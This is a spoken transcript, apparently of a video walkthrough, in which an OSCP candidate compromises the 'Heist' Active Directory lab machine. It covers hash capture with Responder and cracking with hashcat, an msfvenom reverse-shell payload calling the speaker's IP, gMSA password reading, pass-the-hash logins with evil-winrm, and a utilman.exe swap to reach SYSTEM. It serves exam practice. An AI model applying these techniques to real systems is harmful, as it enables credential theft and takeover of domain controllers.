Okay, hello everyone. So today we're gonna solve this Heist machine, which is a Windows Active Directory machine. That's gonna be interesting. The community rated this machine as very hard, and OffSec thinks it's a hard machine. So let's see how we can do this. Like as always, let's go ahead, run this Python script. Windows, it's gonna be Heist. Okay, let's go to it and then run our nmap scan. Let's copy the IP, on, nmap, heist.nmap. Okay, so this is gonna create a little directory that we have in Obsidian. Where is it? Heist. Okay, let's rename this to AD set. Okay, let's open this nmap. And then let's open this one as well. Let's put the IP here. Okay. So I've done like, let's see, OSCP. As you guys might know, I'm preparing for the OSCP exam and I've done quite a lot of boxes so far. Completed 59 box and it seems like 5 remaining. So 4 Windows Active Directory and just one Linux machine, Mantis. So I have tons of practice in Linux and also like just standalone Windows as well. Uh, I don't think I'm quite comfortable working with an AD set compared to like a standalone Linux machine, but I still know um, a lot about AD attack vectors and all that. So hopefully this machine won't be too hard so that we can get through. See how long it's gonna take. I think just like couple more minutes here, maybe even seconds. Yeah, it's already almost done. Let's close this one. Let's actually open up our burp proxy. Let's smooth down. Okay, come on. We have 22 services open. Okay, it's almost done. 97%. It's going to be a lot of ports to enumerate, so we'll see how that goes. 99.97, okay. I think next time I should complete this nmap scan and then start the video, I guess. It's kind of taking too long. Sometimes it takes like 20 seconds. Okay. All right, we're done. Let's copy all this information back to our Obsidian and we can basically clear this one. Like in the backend, I'm just gonna in the background, sorry, just gonna run a UDP scan just to have that as well. Okay, what do we have? I mean, of course, this is a domain controller, so we have Kerberos, um, we have LDAP, um, we have an RDP port open. We have an HTTP, actually two HTTP ports. We have .NET message framing as well. Okay. Before jumping right into these HTTP ports, I'm just gonna start with enumerating the SMB shares and also LDAP as well. But before doing that, let's add this to our /etc host. What is so EC1? Of course, we're gonna delete this. Can we do like this? Yeah, I think this works. Let's start with enum for Linux and then the IP. Let's see what we got here. Without waiting this one, I'm gonna just search through my nodes for LDAP. I know we can get really good information. This one, no. This one, not that one. Actually, let's go like this. OCP exam, LDAP. Okay, here we go. What can we do? We can query this one. So it's gonna be Heist offsec. Was it Heist at offsec? Yes. Can I connect LDAP server? Let's do this. Instead of LDAPs, secure LDAP, let's query the 389. Okay, we have some stuff here. Okay. So the name and context is this, right? Let's just take a note of that. 389 LDAP. So with getting this naming context, pretty sure we can what we can do is just instead of the domain address, let's try to just send a request to x-b. It's gonna be the naming context, and then let's see what we got. Okay, we didn't get anything. Do we need to classify the object as well? Let's give it a wildcard. Okay, it's not working. So dash h dash x dash b. Am I missing something? I think we need to like have some sort of users to get authenticated, right? Naming contexts. Well, feels like it's not gonna work. Let's get back to, oh, we didn't get anything. So even if I don't get anything from enum for Linux, I just run also enum for Linux ng as well, you know, because this one is a little bit, this is like the next generation of the previous tool, but we still won't get too much stuff here. appears to be root parent DC heist.offseg. Domain member. Okay, these are just defaults. I mean, not defaults, but we don't have much here. Okay. I mean, I'm not going to do anything for the RDP. We don't have any kind of credentials as of right now. I think let's go with these HTTP ports, right? I think that's better. 5985. Wait, this is no, this is WinRM, but it's showing as like an HTTP port. But this is WinRM, so let's go to port 8080. Secure web browser. Okay. Let's give this 8080 HTTP. I'm just gonna run a dir search, directory search with this IP. Okay. Do we have anything else? No. Enter URL. Let's see. HTTPS google.com. What's it gonna do? Probably doesn't have any outbound internet connection. Can we request timeout? Oh, yeah, of course. Because we did not specify the port. 8080. Let's just run like Python HTTP server on port 80 and see if we can request our Python server. 168.45.223. Yes, we can. Interesting. Okay. Can we... So we can only request it. So if we go to it, can we... The request URL was not found. Reports? Can we try to like download it at least? Let's see, MSF Venom, P Windows. Let's just give it a x64 reverse shell TCP. Lhost 192.168.45.223. L port is gonna be, let's see, let's do 8080. FEXE shell.exe. Oh, well, this is wrong. Sorry, guys. So it's gonna be reverse TCP and shell. Can we? Let's see if we can download this first. Shell.exe. This program cannot be run in DOS mode. Virtual. Okay. We don't have anything. So this program cannot be run in DOS mode. What kind of... Okay. We can't run it. Okay. Okay. What is that random topic? Unable to connect to internet. It's requesting localhost and it's giving us the game. Okay, perfect. Game over. Okay. So I'm just gonna try to like see these requests. So unable to connect. So what kind of web server is that? That's a Python web server? Hmm. So what can we run here? Do we have any directories yet? No. Let's go back to our nmap scan. So, I mean, we're not, I mean, let's try to see if we have any kind of at 192 and then I start offsite. So we only have a record, nothing else. Any zone transfer? No. Can we do any? Okay, we don't have. We have the DCO one and the A request. So, okay, let's skip domain. I mean DNS. We skipped Kerberos as well. So we couldn't get anything from these. Right? Yes, we didn't. So we can't do. Let's put this here as well. So we have KPass WD5. This is something we can take a look at once we are inside the system. Like we might be able to get some sort of credentials to crack the password of the I think it was K password manager. Yeah, KeyPass. You'll deal with that later. Um, I think this is also LDAP. Let's add this here just to be concise. So I want to try to get the usernames off of the LDAP server. So this should work, but it's not working for me right now. Why you're not working? Unrecognized option dash. I mean dash H is the way how we specify it though, isn't it? So dash capital H is the URI. What about just the IP? Okay, let's do capital H and LDAP. That's that offsec. Do we have to put the port 389? I think we do. Yeah, I think we don't have anything for the. Wait, is the port correct? Yeah, 389. Oh yeah, so in order to perform this operation, a successful bind must be completed on the connection. So why we're getting this? The reason why we're getting this is I had this Nagoya machine, right? All that. Okay. So we were able to get lots of information like back here when we use just dash B with like an empty string. This is basically the search base, but we're putting it as an empty parameter, which is getting the search base to the root of the directory, also known as the root DSC. But if we specify the base, like the actual name context of it, it's not gonna give us more information because it's gonna need some sort of credentials. Like we will need to have a credential to get this information. Okay, let's not continue with LDAP. I think we should focus here. So I don't know if this is a PHP website. I don't think this is a PHP website though. Um, let's try to see. Let's try to see the source code. So it's a pending URL HTTP. Okay. Localhost. Is this the URI that we are when we have our, let's clear this. When we have our Python server, is this the URI that's using? Okay, yeah, it is. So it's URI, a URL encoding it, and it's calling it. This program cannot be run in DOS mode. So if this is the thing we are getting, let's just take a screenshot. We want to remember this. Let's update our notes. When we uploaded, when we tried to upload shell.exe, the request was being sent to our Python server, but it wasn't executing it. Okay, this is enough. I just want to get this request. Let's clear all these. All right. This program cannot be ran in DOS mode. Bypass this. Is it because like the architecture didn't match? Because I remember we used let's delete this. Shell.exe ms-phantom -p windows shell reverse, I mean x86 shell reverse TCP. I'll host 192.168.45.223. I'll port 8080 f exe shell.exe. Let's just like give this a try. Oh, so okay. We did not get any error here, right? So I think this machine is x86. Um, we have Burp Suite open for port 8080. So let's turn this off. RL wrap 8080. Can we even like execute this though? I'm not, this is not gonna work, of course. Yeah. So we need to come up with a way to download it and then execute it. So can we do something like this? Echo IEX. Okay, I actually have this in my notes. Echo IEX. This. Can we do something like that? Mm, 192.168.45.223 shell.exe. No, we can't. Um, if I were to host an SMB server in packet, SMB server, SMB2 support, share here. If I were to do this 192.168.45.223 and then shell.exe, will we get it? No. So this has to be something with we'll have to do HTTP. So we'll have to do this for sure, right? Shell.exe. But can we like pipe cmd.exe like shell.exe? No, we can't. So if this is installed, right? Because we installed it previously, we will need a way to execute this. Is there any like uploads directory? No, nothing. We don't have anything from the directory search. Can we try to do a file search? So like raft large files. Actually, let's do medium. Medium. Oh, sorry. So I'll do lowercase because Windows is not case sensitive. Let's wait for that. But let's try to come up with some ways to execute this. Mm-hmm. Shell.exe. No. What I'm just gonna try is let's turn this off. Open the burp. I want to intercept this. Can we do like x4 weirded for localhost? No. Okay. So I think what we're gonna do is I'm just gonna go ahead and try to analyze it one more time. Okay? Just one more time. Clear history and see what we're getting here. Okay. I mean, it's appending the URL parameter and then going to our Python server, right? Can this be some sort of like SSRF exploitation, like a server-side request forgery. Let's see. Because I remember, like, when we are going to this, it sends a request to its local host, right? What about, like, what if we do 197? I mean, let's send this to repeater. Let's just send it to see what's the request. Nothing is here, okay. Like 192, oh, 127.0.0.1. Error occurred. So same thing. Whoa, what is that? These are just nonsense, right? So 178,000. Yeah, it's okay. It's identical. So what if we change this refer to localhost? Same thing. Um, maybe not that one, but what about this one? So it doesn't even. Interesting. Okay. Well, we still didn't get anything, but the last thing, I guess I should try this first, but uh, I'm gonna run responder. So this is a Windows machine, right? And I'm pretty sure it's one of the users are just taking the request and sending like a get request and then downloading the stuff here. Um, so let's run sudo responder on the ton0 interface. Uh, so let's try to actually go to our. Let's try to go to here. Okay. So see, so the Enox user is sending this request. So even if there's nothing here, because our Python server is not even running, it's just sending this request, right? So let's take all this. Actually, let's take a screenshot. Here, port 8080. We were able to run responder i10 and get a user hash, user NTLM v2 hash. Okay, let's copy this. We can stop this responder. Nano enox.hash. So we're gonna use hashcat. Let's just let this identify the hash. Okay, this one. Hashcat m5600 enox.hash. User share wordless rocku.txt. let's give this, okay, this was quick. So the password is California. Perfect. Enox. This password is California. We cracked the password of the hash and got this password. So how can we log in? What do we have for login? We have Evil WinRM. We have WinRM that we can use Evil WinRM. We have RDP. Okay, the first thing that I'm gonna try is like SMB client, IP, user Enox, actually Heist dot offsec Enox. Password is gonna be California. Perfect. Can we read these though? I don't think we can read admin right away. Yep. Nope. What about C? Nope. What about, I don't think IPC is relevant. Nope. What about syslogon? I mean syslog. Nope. Okay. We couldn't get anything. I just want to take a note of that as well. We couldn't get any connection to SMB with valid credentials. Let's try to use Evil WinRM. What was the syntax for this? Okay. Dash I 192.168.194 and 165. User Enox, password is California. Okay, perfect. So we got our first shell. We got access to Enox using Evil WinRM and continued on post exploitation. So let's close this one, and open up the post exploitation and copy the URL, Obsidian URL, and then paste it here. Okay. So we are in the documents folder. Let's go to desktop and get our local.txt. Submit this back to our portal. Okay. What is this? todo.txt. Set up Flask application for secure browser. Use group managed service account. Migrate to Apache. Debug, remove, submit IT expense to file admin. Okay. What is this application folder? Templates app.py. So this is the application that we were using. Okay. Let's see the templates as well. There. Let's see index.html. I mean, we actually saw this before. So let's just go to the root directory. Oh, what is this? Windows 10 upgrade. Interesting. Oh, actually, let's do some basic enumerations. Who am I all? Let's close this one. So we have SE machine account privilege. Add workstation to domain. change notify privilege, bypass traverse checking. Okay, so we don't have any privilege that we can play with. What kind of groups are we in? Network users, remote management users, NTLM authentication. Okay, what I would like to run is Bloodhound. So locate sharp hound. Let's try to use sharp hound. Let's use sharphound.exe. Copy Python 3 and HTTP server. Let's copy this name as well. CD users, what was it? CD Enox. We get assert util FURL cache HTTP 192.168.45.223 name and then the file. Actually, net user domain. So we have this SVC Apache user. I wonder if we need to do like Kerberos thing, something like that. But actually, before doing that, so sharphound.exe. Oh, what? Let's see, how are we using this again? Sharphound.exe. Yeah, collection methods all. Sharphound.exe collection methods all. Let's and this is running. Let's try to see inpacket get np users get np users. Let's see if we have anything. TCP is gonna be this, and then request heist.offsec Enox California. I think I put the password wrong. California. No entries found. Let's try get SPN. What was it? Yeah, get users SPN. California. No entries found. Okay, we don't have any Kerberos thing going on. We found 93 objects. Okay. Let's run the sudo inpacket smb server smb2 support share dot. We probably gonna need the password, the credentials. Yeah, so it's gonna be user Cali, password Cali. Okay. And then how do we request it again? It's gonna be net use. So it's gonna be like this. 45223. We have connection. So we're gonna do there. We basically want this one. Copy item path C users. Oh, I mean C. What am I doing? What is happening? C users Enox, and then this, and then the destination is gonna be K bloodhound.zip. Let's see. Do we have it? Yes, we do. Okay. So let's spin up nail4j start. Locate bloodhound. Oh, we have tons of stuff. What was the path? I mean, I think this was the path. Or actually, cd OSCP tools, Bloodhound Linux, Bloodhound no sandbox. Okay, perfect. We have the Neo4j running. Let's upload data. So it's gonna be proving grounds, Windows machines. Where is it? I mean, Heist. Where's Heist? Okay, here. Bloodhound zip. Okay, perfect. Clear, finished. So let's search for Enox. Since we own this, let's mark it as user owned. Let's see if we have any relations. First degree memberships. Web admins, remote management user, domain users. I actually want to set this to always display. Okay. Let's go to analysis. Let's try to see Kerberos tool account. No, not that. Shortest path from own principles. Can PS remote. I mean, we know we can PS remote, right? Because this is basically the user needs to get a PS remote connection with computer allows the interactive session with targeting update for this allowing publish may allow you to gain high. This does not guarantee privilege escalation. Okay. Let's close this one. Short path to unconstrained delegations. Stable user, not that one. Shortest path to domain admins. We don't have anything. High value targets. We don't have anything. Just want to see return M match M. What was the query here? I always forget. Return M. Oh yeah. Match. So we have Enox, we have administrator. So I think we have nothing to do with this service account because we don't have any Kerberos thing attack going on because I tested this before. Okay. Let's transfer WinPs. Locate WinPs.exe. Let's copy this one. I think we can do like download WinPiece. Check file names or paths. Oh, we're in a, sorry. WinPiece should be in OSCP Proving Grounds, Windows, Heist. Oh, we didn't copy it actually. What happened here? I just want to remove WinPiece from here and then go to OSCP Proving Grounds, Windows, Heist. Okay, we have WinPiece. Let's run it again. Download winpiece.exe. Why you're failing though? It should be there. Do we have the Python server running? We don't. Okay. Cert-util fprl cache http 192.168.4523 winpiece.exe winpiece. Okay, let's run winpiece here real quick. I just want to see what we can have from this. Okay. Cached logo on is 10. Program file NSM 2.24. Let's skip these. Python 39 scripts. Uncoded space, uncoded path. Nope, that's not gonna work. Skip these. We can skip that one as well. So we did have these, right? Yep. Yep, we all had these. I mean, there's not much useful stuff. What is that? Test history? Okay, we found nt user dot. These are not password files. We already got the local.txt. Okay, yeah, we don't have much here. So let's continue with this again. Analysis. So again, so this is like too much info. Where's our user? Our user is not here. Curb roastable. We have nothing in curb roastable. Can PS remote? Can we like? Can we do something with this? I mean, we already have access as Enox to the DC via using the evilbinrm. Abuse info, abuse this privilege, blah blah blah. A remote session can be opened with new PS session PowerShell command. We know the password, we can skip that one. Then use new PS session command with credential just created. This will open a PowerShell session. We already have that. You can then run commands to invoke commands CMS session you just created. An example of running through this Cobalt Strike for lateral movement is okay, this is not too much useful. Let's go to this user again. Group delegate. What is this? So we are a member of web admins and read gMSA password. As a group member, group managed service account, the group can retrieve the password. So we can retrieve the password of SVC Apache, right? How can we abuse this? Finally, it's possible to remove the password and convert that password to its equivalent NT hash, then perform over the hash to retrieve a Kerberos ticket from the gMSA. Okay, things are getting interesting. Build gMSA password reader from its source, drop password to disk if using Cobalt Strike, load and run this binary. Okay, I think we're gonna run this with the account name of SVC Apache, and we're gonna get the password hash of the SPN service principal name account, and using that password we can transform that into NTLM hash and then possibly get over the hash and get a domain admin access or like an administrator access. Let's do this. Let's go to Google. Let's download. Do we need to download this all? Clone this repo and build using Visual Studio. We don't have Visual Studio, so we need precompiled we need a precompiled binary for this purpose, and there's no precompiled binary, unfortunately. Let's see. Windows precompile compile binary. Oh, we already got something. I think we're on a on our right path. Oh, there's a cool. There's a Python script. Oh, can we also use NTLM Relay X? Hmm. We actually have this in our Kali box. Let's open a new terminal. In packet NTLM Relay X TLDAP S 192.1.6. What was the path? What was the IP again? Not this. Okay. Okay. Debug dump gMSA no dump. Interesting. No DA. No ACL. No validate. Chris. Server started waiting for connections. I mean, if we still like if we go to here, you're gonna get Enox, right? Sorry, here. No, we did not get anything. I don't want to do this. I want to use this one, gMSA dumper. Let's clone this. Git clone cd gMSA dumper python gMSA dumper.py. The user is Enox. The password is California. Domain is heist.opsec. Users or group, we can read password for SVC Apache. Is LDAPs enabled? I mean, we are in web admins, right? Net user group. Net group. So we are in web admins. Net group. Web admins. I mean, not group. Group. So Enox, we are the member of it. Why it's not working then? Well, we don't have a Visual Studio, so we can't. I don't think we can build this. The first one uses Active Directory and DS internals PowerShell modules. Decode the data structure from DS. Can we use this? Let's see. Wait. Let's do like this. Target account is gonna be SVC Apache, but I actually want to do net user SVC Apache. Domain. Why can't we request that? Let's see. Net user. The SVC Apache was there. Oh, so the dollar sign needs to be there as well. Let's see. There's no such user. Net user domain. Oh, interesting. Anyways, let's try to do SVC Apache dollar sign. And then run this one. And then convert this. We're gonna get some sort of error. I hope not though. Because what interesting to me is that we were not able to, yeah. Oh, wait. The term convert from AD managed password block is not recognized. DS internals PowerShell. Do we have DS internals PowerShell? Can we do like this right away? Administrator rights are required to install modules. Okay, we can't do it. Let's go back. Let's get more help. So this should ideally work though. Why it's not working? Let's actually close these. Too much info here. Too much tab open. Why we are not able to run this? Do I have to give the full path? LDAP failed. Do I have to pass like the DC? I mean, not it's Heist. Automatic bind not successful. Let's try to see how we can use this. For Kerberos authentication, pass hash specific LDAP server. I mean, we do have valid credentials. Wasn't it California? Yeah. Enox. No, it's not working. But we are a member of web admins. That's the issue. Let's see. Scripts. Just want to get more information into this. gMSA. The PowerShell Active Directory module can be enumerated to MDS. gMSA, sorry. So this one didn't work because we can't build it. This one also didn't work. Uh, is this the same thing? Oh wait. So let's download this to Windows and then Heist. The x86. How can we run this? How can we run this? Okay, you know what? I think um since we cannot build this, what we're gonna do is basically just like search for it, and then I hope there's gonna be a pre-compiled binary gMSA password reader.exe. Okay, I think this is the one we want. So let's download this. Not Linux, Windows, and then where is it? Heist. I always okay. Okay, do we have it? We have it. Let's run the HTTP server. Oh, we are running HTTP server. Um, what was the name? Okay. Okay, now how are we gonna use this? Let's see. It should be somewhere here. So, okay. The usage is pretty simple. Account name is gonna be SVC Apache and then dollar sign. Oh, finally. Okay. Let's take a screenshot of this and then go back. Well, we actually did not update our notes for a while, but it's okay. Let's just put this here. Um, this is the current value. Okay, how do we crack this? Does it help us on how to crack it? This is MD5. Can we just do like crack station? This is not MD5, is it now? Um, cracking password. gMSA. Okay, I think this is gonna help us. Um, does it get the crit hashes here? Maybe we don't even need to crack it. Uh, no, this is not gonna help us. Mm, I mean, it doesn't give us any clue on what which one to use, but I guess I'm just gonna try um this one. Let's let's do eval NRM. IP is gonna be this bad boy. User SVC Apache and $. It's the hash. Okay. Capital hash. And let's use the RC4 HMAC. Okay, nice. Yeah, just what I thought. So now we have access to SVC. Oh, let's update the nodes using the RC4 HMAC password hash. Let's just say hash. We were able to log into the SVC Apache $ user service user service account. Okay, this is better. So let's see, who am I? Oh, we have SE restore privileges. This is an addition because we had these three: machine account, change, notify, and increase working. Now we have SE privilege, restore privilege, restore files and directories. Let's see if we can find a way. Let's close all these. This one as well. Abusing token privileges for local privilege escalation. Oh wait, I think let's go back to here. Drop gMSA this using you can perform pass the hash, overpass the hash, or any other technique that takes an NT hash as an input. Let's try go to our notes, Windows Active Directory, attacking ID. Not attacking ID, it's lateral movement. Pass the hash, overpass the hash. You can use NTLM user hash to gain full Kerberos ticket granting ticket. What can we do? So let's go back. I think we have to. Okay, look, SE restore privilege to system. Execute a command as system when SE restore privilege is assigned. In case it's disabled, the program will enable it for you. Do we have to build this again? SLN. Yeah, we have to build this as well. We don't want to build this. SE. Where is SE restore? Oh, SE restore. Let's see. Launch PowerShell with restore privilege. Enable the privilege with enable SE privilege. Rename utilman exe to utilman alt. Rename cmd.exe to utilman.exe. Log the console and what? Attack may be detected. Is it enabled? Yes, it is enabled. Let's just go to Hacktricks, and then go to search bar. Why can't we search it? Okay, let's Windows local privilege escalation access tokens SE. What was it? Oh my god. SE, yeah, SE restore. We don't have any SE restore. Abusing tokens table. Let's see. Rename utilman.exe to utilman.old. Rename cmd.exe to utilman.exe. Lock the console and press Win plus U. I mean, we don't have an RDP session yet. Let's see. Let's try to see this resource. I mean, can we do this? Backup SAM and system hashes? Let's see if we can. I think we have to give a path. System.hive. A required privilege is not held by the client. Okay. I just want to get access to, exploit this restore privilege. Let's try to use this again. Launch PowerShell with SE restore privilege present. Enable the privilege. I mean, it's already enabled, right? We don't need to do anything for that. Rename utilman.ext to utilman.old. Okay, I'll do that. I'll do that. How can we, where is utilman.exe though? Where is located in Windows? So Windows 32 system utilman exe. Let's go to here. Oh, not dire. Oh my god. Oh, dear. Tillman.exe. Okay, we have that. So let's move utilman.exe to utilman.old. A positional parameters. I think what we have to do, why there's two here. Okay, now we did it. So now we're gonna do rename cmd.exe to utilman.exe. Move cmd.exe to utilman.exe. Okay, lock the console and press. So lock the console and press Win plus U. So pressing Win plus U is like a RDP kind of thing, key binding. So I think we have to do like our desktop and then the IP. I do trust. So if I do win dot, okay. So I basically pressed Windows key and then U. Who am I? NT Authority System. Sweet. Okay. We basically pound the machine, guys. Users, CD administrator, CD desktop, type proof.txt. And we can go back and paste this here. Oh, not this. Oh, can we not copy this? Oh my god. Am I gonna like type it? Okay, anyways, like I think I can type this later, but I think this was a fun machine. I think I've learned a lot because I never did an Active Directory machine using like gMSA password change of an SPN account and then changing the binary of utilman.exe to cmd.exe. This utilman.exe, I think, what is utilman.exe? I think this is a process for like the Windows logon or RDP logon. Yeah, RDP. So basically pressing Windows key and U after the after opening the RDP session, since we changed it to cmd.exe, that basically gave us the shell. Yeah, such a great machine. Well, thank you for watching it. I'll see you in the next video. Have a good one.